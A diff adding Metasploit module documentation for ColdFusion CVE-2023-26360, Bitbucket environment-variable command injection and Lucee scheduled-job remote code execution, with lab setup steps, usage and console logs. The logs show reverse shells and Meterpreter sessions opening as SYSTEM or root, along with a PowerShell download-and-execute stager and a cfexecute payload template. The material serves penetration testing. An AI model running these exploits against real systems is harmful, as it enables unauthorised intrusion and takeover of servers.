+4. By default, Coldfusion will serve HTTP from TCP port 8500. Configure the operating system firewall to allow remote
+access to this port. For example on Linux you can run `sudo ufw allow 8500/tcp`.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360`
+3. `set LHOST eth0`
+4. `set RHOST <TARGET_IP>`
+5. `set target 3`
+6. `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
+7. `check`
+8. `exploit`
+
+## Scenarios
+### Generic Java (Adobe ColdFusion 2021 Update 5 on Windows Server 2022)
+```
+msf6 > use exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > show options
+
+Module options (exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360):
+
+   Name          Current Setting      Required  Description
+   ----          ---------------      --------  -----------
+   CFC_ENDPOINT  /cf_scripts/scripts  yes       The target ColdFusion Componen
+                 /ajax/ckeditor/plug            t (CFC) endpoint
+                 ins/filemanager/ied
+                 it.cfc
+   CF_LOGFILE    ../logs/coldfusion-  yes       The target log file, relative
+                 out.log                        to the wwwroot folder.
+   Proxies                            no        A proxy chain of format type:h
+                                                ost:port[,type:host:port][...]
+   RHOSTS                             yes       The target host(s), see https:
+                                                //docs.metasploit.com/docs/usi
+                                                ng-metasploit/basics/using-met
+                                                asploit.html
+   RPORT         8500                 yes       The target port (TCP)
+   SSL           false                no        Negotiate SSL/TLS for outgoing
+                                                 connections
+   SSLCert                            no        Path to a custom SSL certifica
+                                                te (default is randomly genera
+                                                ted)
+   URIPATH       /                    no        The URI to use for this exploi
+                                                t
+   VHOST                              no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to
+                                       listen on. This must be an address on t
+                                       he local machine or 0.0.0.0 to listen o
+                                       n all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (java/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be s
+                                     pecified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Generic Java
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set LHOST eth0
+LHOST => 172.23.57.124
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set SRVHOST eth0
+SRVHOST => 172.23.57.124
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set RHOST 172.23.49.239
+RHOST => 172.23.49.239
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > check
+[*] 172.23.49.239:8500 - The service is running, but could not be validated. ColdFusion detected but version number is unknown.
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > exploit
+
+[*] Started reverse TCP handler on 172.23.57.124:4444 
+[*] Using URL: http://172.23.57.124:8080/
+[*] Received payload request, transmitting payload jar...
+[*] Received payload request, transmitting payload jar...
+[*] Received payload request, transmitting payload jar...
+[*] Sending stage (58851 bytes) to 172.23.49.239
+[*] Meterpreter session 1 opened (172.23.57.124:4444 -> 172.23.49.239:49815) at 2023-04-11 14:10:13 +0100
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: WIN-9SIICLTVVC7$
+meterpreter > pwd
+C:\ColdFusion2021\cfusion\bin
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.23.49.239 - Meterpreter session 1 closed.  Reason: User exit
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > 
+```
+
+### Windows Command (Adobe ColdFusion 2021 Update 5 on Windows Server 2022)
+```
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set LHOST eth0
+LHOST => 172.23.9.70
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set RHOST 172.23.13.12
+RHOST => 172.23.13.12
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set target 1
+target => 1
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set PAYLOAD cmd/windows/powershell_reverse_tcp
+PAYLOAD => cmd/windows/powershell_reverse_tcp
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > check
+[*] 172.23.13.12:8500 - The service is running, but could not be validated. ColdFusion detected but version number is unknown.
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > exploit
+
+[*] Started reverse TCP handler on 172.23.9.70:4444 
+[*] Powershell session session 1 opened (172.23.9.70:4444 -> 172.23.13.12:57546) at 2023-04-06 12:20:27 +0100
+
+PS C:\ColdFusion2021\cfusion\bin> whoami
+nt authority\system
+PS C:\ColdFusion2021\cfusion\bin> exit
+
+[*] 172.23.13.12 - Powershell session session 1 closed.  Reason: User exit
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > 
+```
+
+### Windows Dropper (Adobe ColdFusion 2021 Update 5 on Windows Server 2022)
+```
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set target 2
+target => 2
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set PAYLOAD windows/x64/meterpreter_reverse_tcp
+PAYLOAD => windows/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > check
+[*] 172.23.13.12:8500 - The service is running, but could not be validated. ColdFusion detected but version number is unknown.
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > exploit
+
+[*] Started reverse TCP handler on 172.23.9.70:4444 
+[*] Command Stager progress -   0.73% done (2047/279726 bytes)
+[*] Command Stager progress -   1.46% done (4094/279726 bytes)
+
+...snip...
+
+[*] Command Stager progress -  99.52% done (278392/279726 bytes)
+[*] Command Stager progress - 100.00% done (279726/279726 bytes)
+[*] Meterpreter session 1 opened (172.23.9.70:4444 -> 172.23.13.12:57554) at 2023-04-06 12:23:48 +0100
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.23.13.12 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > 
+```
+
+### Linux Command (Adobe ColdFusion 2021 Update 5 on Ubuntu 22.04)
+```
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set target 3
+target => 3
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set PAYLOAD cmd/unix/reverse_perl
+PAYLOAD => cmd/unix/reverse_perl
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set RHOST 172.23.0.98
+RHOST => 172.23.0.98
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > check
+[*] 172.23.0.98:8500 - The service is running, but could not be validated. ColdFusion detected but version number is unknown.
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > exploit
+
+[*] Started reverse TCP handler on 172.23.9.70:4444 
+[*] Command shell session 2 opened (172.23.9.70:4444 -> 172.23.0.98:47598) at 2023-04-06 12:27:55 +0100
+
+id
+uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
+pwd
+/opt/ColdFusion2021/cfusion/bin
+```
+
+### Linux Dropper (Adobe ColdFusion 2021 Update 5 on Ubuntu 22.04)
+```
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set target 4
+target => 4
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > set RHOST 172.23.0.98
+RHOST => 172.23.0.98
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > check
+[*] 172.23.0.98:8500 - The service is running, but could not be validated. ColdFusion detected but version number is unknown.
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > exploit
+
+[*] Started reverse TCP handler on 172.23.9.70:4444 
+[*] Using URL: http://172.23.9.70:8080/lzD4G6tt1
+[*] Client 172.23.0.98 (curl/7.81.0) requested /lzD4G6tt1
+[*] Sending payload to 172.23.0.98 (curl/7.81.0)
+[*] Sending stage (3045348 bytes) to 172.23.0.98
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 2 opened (172.23.9.70:4444 -> 172.23.0.98:43168) at 2023-04-06 12:29:23 +0100
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: nobody
+meterpreter > pwd
+/opt/ColdFusion2021/cfusion/bin
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.23.0.98 - Meterpreter session 2 closed.  Reason: User exit
+msf6 exploit(multi/http/adobe_coldfusion_rce_cve_2023_26360) > 
+```
@@ -0,0 +1,272 @@
+## Vulnerable Application
+
+For various versions of Bitbucket, there is an authenticated command injection
+vulnerability that can be exploited by injecting environment
+variables into a user name. This module achieves remote code execution
+as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment
+variable, a null character as a delimiter, and arbitrary code into a user's
+user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
+will be run once the Bitbucket application is coerced into generating a diff.
+
+This module requires at least admin credentials, as admins and above only have the
+option to change their user name.
+
+The [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html) lists the following versions as vulnerable:
+
+    * 7.0 to 7.5 (all versions)
+    * 7.6.0 to 7.6.18
+    * 7.7 to 7.16 (all versions)
+    * 7.17.0 to 7.17.11
+    * 7.18 to 7.20 (all versions)
+    * 7.21.0 to 7.21.5
+
+If mesh.enabled=false is set in bitbucket.properties:
+
+    * 8.0.0 to 8.0.4
+    * 8.1.0 to 8.1.4
+    * 8.2.0 to 8.2.3
+    * 8.3.0 to 8.3.2
+    * 8.4.0 to 8.4.1
+
+### Installation Instructions
+
+1. Install Git on the target machine
+  * For Linux
+    * sudo apt install -y git
+  * For Windows
+    * Download an [installer](https://github.com/git-for-windows/git/releases/download/v2.39.2.windows.1/Git-2.39.2-64-bit.exe)
+    * Selecting all defaults should be fine
+2. Download a vulnerable version of Bitbucket. For example, version `7.18.1` can be found
+[here for Linux](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.bin) and [here for Windows](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.exe)
+3. For Linux, make sure the resulting bin file is executable and run it. Just double click on the installer file if using Windows
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990. If installing an 8.* version of Bitbucket, you will need to create
+a `bitbucket.properties` file at `/var/atlassian/application-data/bitbucket/shared`. Once created,
+add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
+4. Do: `set USERNAME <username>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `set RHOST <target_ip>`
+7. Do: `set LHOST <listen_ip>`
+8. Do: `run`
+9. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Username to authenticate with and has at least admin privileges
+
+### PASSWORD
+
+Password to authenticate with
+
+## Scenarios
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, CMD Target
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username test
+username => test
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password password
+password => password
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'fjNMKiB'
+[+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
+[*] Sending payload
+[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:41118) at 2023-03-13 14:04:00 -0500
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+uname -a
+Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, Linux Dropper
+
+```
+msf6 exploit(multi/http/bitbucket_env_var_rce) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+    0   Linux Command
+=>  1   Linux Dropper
+    2   Windows Dropper
+
+
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'gmoQNc'
+[+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/VtgFQ7yCgjcP
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /VtgFQ7yCgjcP
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  53.04% done (61/115 bytes)
+[*] Command Stager progress -  72.17% done (83/115 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:50632) at 2023-03-13 14:06:18 -0500
+[*] Command Stager progress -  83.48% done (96/115 bytes)
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```
+
+### Windows 10, x64 - Bitbucket `v7.18.1`, Windows Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
+rhost => 192.168.140.171
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
+username => admin
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
+password => P@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found version 7.18.1 of Bitbucket
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Retrieving security token
+[*] Project creation was successful
+[+] Successfully created repository 'GqFji'
+[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
+[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
+[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
+[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Command Stager progress -  75.19% done (97/129 bytes)
+[*] Sending stage (175686 bytes) to 192.168.140.171
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
+[*] Command Stager progress -  86.05% done (111/129 bytes)
+[*] Command Stager progress - 100.00% done (129/129 bytes)
+[*] Changing user name back to 'admin'
+[*] Attempting to delete repository 'GqFji'
+[+] Repository has been deleted
+[*] Now attempting to delete project 'eTzDRa'
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: DESKTOP-5JSUGC8\atlbitbucket
+meterpreter > sysinfo
+Computer        : DESKTOP-5JSUGC8
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x86/windows
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v8.4.0` with mesh.enabled set to false, Linux Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
+username => administrator
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
+password => S3cureP@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Versions 8.* are vulnerable only if the mesh setting is disabled
+[+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
+[*] Project creation was successful
+[+] Successfully created repository 'IuNYsZZPl'
+[+] Commits added: 560d760fdcbcf210c2c1b6dd04663381002066e5, 53ada0136f82899451c16a00cb939225dba53336
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/qt9f0M
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /qt9f0M
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  50.46% done (55/109 bytes)
+[*] Command Stager progress -  70.64% done (77/109 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 10 opened (192.168.140.1:4444 -> 192.168.140.149:43360) at 2023-03-14 19:00:00 -0500
+[*] Command Stager progress -  82.57% done (90/109 bytes)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
+[*] Changing user name back to 'administrator'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```
@@ -0,0 +1,221 @@
+# Vulnerable Application
+Lucee is an Open Source ColdFusion server/engine intended for rapid web development. Many implementations of
+ColdFusion files support dynamic input and server side code execution.
+In the case of this module, Lucees implementation supports the use of `cfexecute` and `cfscript` tags in `.cfm` files.
+
+In addition to these features, Lucee provides a scheduled job feature. This feature will accept an
+external `url` argument and query that page on execution. If logging is enabled, it is possible to
+query a remote ColdFusion document, log it in the web root, and access it to execute its code,
+subsequently achieving arbitrary server side code execution. The payload will run as the user 
+specified during the Lucee installation. On Windows, this is a service account; on Linux, 
+it is either the root user or lucee.
+
+The series of requests to achieve this is as follows.
+
+1. Authenticate as the administrator to the web admin panel
+2. Create a scheduled job that includes a URL to the remote ColdFusion document
+3. Update the scheduled job to turn on logging and ensure that the remote document is logged to the web root
+4. Execute the scheduled job. The Lucee server will now reach out to and download the ColdFusion document from the attackers server
+5. Access the document at the web root of the server, thus executing the payload.
+
+The basic format for the remote ColdFusion document is as follows.
+```html
+<cfscript>
+            cfexecute(name="powershell.exe", arguments="-c whoami",timeout=5);
+</cfscript>
+```
+
+The scheduled job feature of Lucee is available in all versions currently available through the vendors website,
+available [here](https://download.lucee.org/).As this is default functionality that does not require
+any additional setup/configuration, the application is vulnerable immediately upon setup.
+
+## Verification Steps
+
+1. Download and install Lucee from the vendors website. This can be done on either a Windows or Unix host.
+   No additional setup is needed beyond the initial installation walkthrough
+2. Start MSF Console
+3. Do: `use multi/http/lucee_scheduled_job`
+4. Choose a target that reflects the target system
+	- `use X` (0 for Windows, 1 for Linux)
+5. Select payload. This functions with command execution payloads and supports reverse shells and generic commands.
+6. Select the desired payload and complete its requirement. `CMD`, `LHOST`, `LPORT`, etc.
+7. Select the appropriate `RHOST`, `PASSWORD`, and (if necessary), the `TARGETURI`
+8. Execute the payload. You should either receive a shell or see the output of your command.
+
+## Options
+
+### RHOSTS
+
+Remote host to target.
+
+### RPORT
+
+Port being used by the Lucee admin panel. Default is 8888
+
+### PASSWORD
+
+The password of the administrative user. Lucee does not use a username, only a password to access the admin panel.
+
+### TARGETURI
+
+Target URI of the Lucee administrator panel. Default is
+
+`/lucee/admin/web.cfm/`
+
+
+### PAYLOAD_DEPLOY_TIMEOUT
+
+Periodically, the target web server may take a moment to download and make the payload accessible. This
+parameter determines how long the exploit should wait until considering the payload inaccessible.
+
+
+## Scenarios
+### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 for a service account shell
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/windows/powershell_reverse_tcp
+payload => cmd/windows/powershell_reverse_tcp
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(multi/http/lucee_scheduled_job) > set LHOST 10.0.0.45
+LHOST => 10.0.0.45
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[*] Started reverse TCP handler on 192.168.19.145:4444 
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/W7hSRT7xJLjosBr.cfm
+[+] Job W7hSRT7xJLjosBr created successfully
+[+] Job W7hSRT7xJLjosBr updated successfully
+[*] Executing scheduled job: W7hSRT7xJLjosBr
+[+] Job W7hSRT7xJLjosBr executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /W7hSRT7xJLjosBr.cfm?RequestTimeout=50 from 192.168.19.131
+[*] Attempting to access payload...
+[*] Powershell session session 1 opened (192.168.19.145:4444 -> 192.168.19.131:53204) at 2023-02-28 19:52:46 -0600
+[*] Received 500 response from W7hSRT7xJLjosBr.cfm
+[+] Exploit completed.
+[*] Removing scheduled job W7hSRT7xJLjosBr
+[+] Scheduled job removed.
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\W7hSRT7xJLjosBr.cfm' on the target
+
+
+Shell Banner:
+Windows PowerShell running as user LOCAL SERVICE on HOMELAB-BINCE
+Copyright (C) Microsoft Corporation. All rights reserved.
+-----
+          
+PS C:\lucee\tomcat> 
+```
+### Successful exploitation of a Windows 10 host running Lucee 5.3.10.120 executing whoami
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
+CMD => whoami
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/UHn0jvUP2ZDtgwN.cfm
+[+] Job UHn0jvUP2ZDtgwN created successfully
+[+] Job UHn0jvUP2ZDtgwN updated successfully
+[*] Executing scheduled job: UHn0jvUP2ZDtgwN
+[+] Job UHn0jvUP2ZDtgwN executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /UHn0jvUP2ZDtgwN.cfm?RequestTimeout=50 from 192.168.19.131
+[*] Attempting to access payload...
+[+] Received 200 response from UHn0jvUP2ZDtgwN.cfm
+[+] Output: nt authority\local service
+[+] Exploit completed.
+[*] Removing scheduled job UHn0jvUP2ZDtgwN
+[+] Scheduled job removed.
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'C:\lucee\tomcat\webapps\ROOT\UHn0jvUP2ZDtgwN.cfm' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Successful exploitation of a Docker host running Lucee 5.1.4.19 for a shell as Lucee
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
+target => 1
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/lucee_scheduled_job) > set LHOSTS 10.0.0.45
+LHOST => 10.0.0.45
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 10.0.0.33
+RHOSTS => 10.0.0.33
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[*] Started reverse TCP handler on 192.168.19.145:4444 
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/CUyWHyD6Y.cfm
+[+] Job CUyWHyD6Y created successfully
+[+] Job CUyWHyD6Y updated successfully
+[*] Executing scheduled job: CUyWHyD6Y
+[+] Job CUyWHyD6Y executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /CUyWHyD6Y.cfm?RequestTimeout=50 from 192.168.19.145
+[*] Attempting to access payload...
+[*] Received 500 response from CUyWHyD6Y.cfm Check your listener!
+[+] Exploit completed.
+[*] Removing scheduled job CUyWHyD6Y
+[+] Scheduled job removed.
+[+] Deleted /srv/www/app/webroot/CUyWHyD6Y.cfm
+[*] Command shell session 1 opened (192.168.19.145:4444 -> 192.168.19.145:58686) at 2023-02-28 19:56:11 -0600
+[*] Server stopped.
+
+whoami
+root
+```
+### Successful exploitation of a Docker host running Lucee 5.1.4.19 executing whoami
+```
+msf6 > use exploit/multi/http/lucee_scheduled_job 
+[*] Using configured payload cmd/windows/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > set target 1
+target => 1
+msf6 exploit(multi/http/lucee_scheduled_job) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/lucee_scheduled_job) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(multi/http/lucee_scheduled_job) > set CMD whoami
+CMD => whoami
+msf6 exploit(multi/http/lucee_scheduled_job) > set PASSWORD admin123
+PASSWORD => admin123
+msf6 exploit(multi/http/lucee_scheduled_job) > run
+
+[+] Authenticated successfully
+[*] Using URL: http://192.168.19.145:8081/GCHSFzGe.cfm
+[+] Job GCHSFzGe created successfully
+[+] Job GCHSFzGe updated successfully
+[*] Executing scheduled job: GCHSFzGe
+[+] Job GCHSFzGe executed successfully
+[*] Attempting to access payload...
+[*] Payload request received for /GCHSFzGe.cfm?RequestTimeout=50 from 192.168.19.145
+[+] Received 200 response from GCHSFzGe.cfm
+[+] Output: root
+[+] Exploit completed.
+[*] Removing scheduled job GCHSFzGe
+[+] Scheduled job removed.
+[*] Server stopped.
